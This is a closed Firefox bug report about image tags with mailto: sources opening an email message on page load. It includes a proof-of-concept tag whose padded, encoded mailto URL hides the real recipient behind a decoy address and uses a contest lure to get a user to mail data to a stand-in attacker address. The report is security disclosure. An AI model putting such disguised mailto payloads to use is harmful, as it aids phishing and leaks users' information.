Closed Bug 273986 Opened 15 years ago Closed 15 years ago

when an image link starts with mailto:// a new email message opens automatically

Categories

(Firefox :: General, defect, major)

x86
Windows XP
defect
Not set
major

Tracking

()

RESOLVED DUPLICATE of bug 181860

People

(Reporter: travis.hardiman+bugzilla, Assigned: bugs)

References

()

Details

Attachments

(1 file)

User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0

<img src="mailto://spacer.gif" /> will open a new message when loaded in html

Reproducible: Always
Steps to Reproduce:
1. create a page with <img src="mailto://spacer.gif" />
2. open in firefox
3.

Actual Results:  
a new email message popped up

Expected Results:  
broken image icon

I'll submit a simplified test case. - TH
when firefox loads the page, a new email message pops up
The reason I marked it security sensitive is because an image like this could be
generated with Javascript:
<img
src="mailto:%22jerk@jerkstore.com______________________________________________________________________________________________________________%22%3Cbiggerjerk@jerksplus.com%3E?subject=Enter%20Contest!&body=Just%20hit%20send%20to%20enter%20contest!%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%5BINSERT_CONFIDENTIAL_STUFF_HERE%5D"
alt="jerk@jerkstore.com" />

I have tested this with both Outlook Express and Thunderbird so I don't think
the email client is to blame.
Bug 181860 and bug 167475 cover the fact that <img src="mailto:..."> can cause a
mailto: URL to open *without user interaction*.

Bug 53703 covers mailto: spoofing issues.  Your exploit doesn't make sense
because if the attacker's JavaScript has access to the user's confidential
information, he has better ways to the information back to the attacker than to
convince the user to send an e-mail message.

*** This bug has been marked as a duplicate of 181860 ***
Group: security
Status: UNCONFIRMED → RESOLVED
Closed: 15 years ago
Resolution: --- → DUPLICATE
--> Websites :: www.mozilla.com so timeless can close out Firefox :: Product Site.
Component: Product Site → www.mozilla.com
Product: Firefox → Websites
-> Firefox::General (939393)
Component: www.mozilla.com → General
Product: Websites → Firefox
You need to log in before you can comment on or make changes to this bug.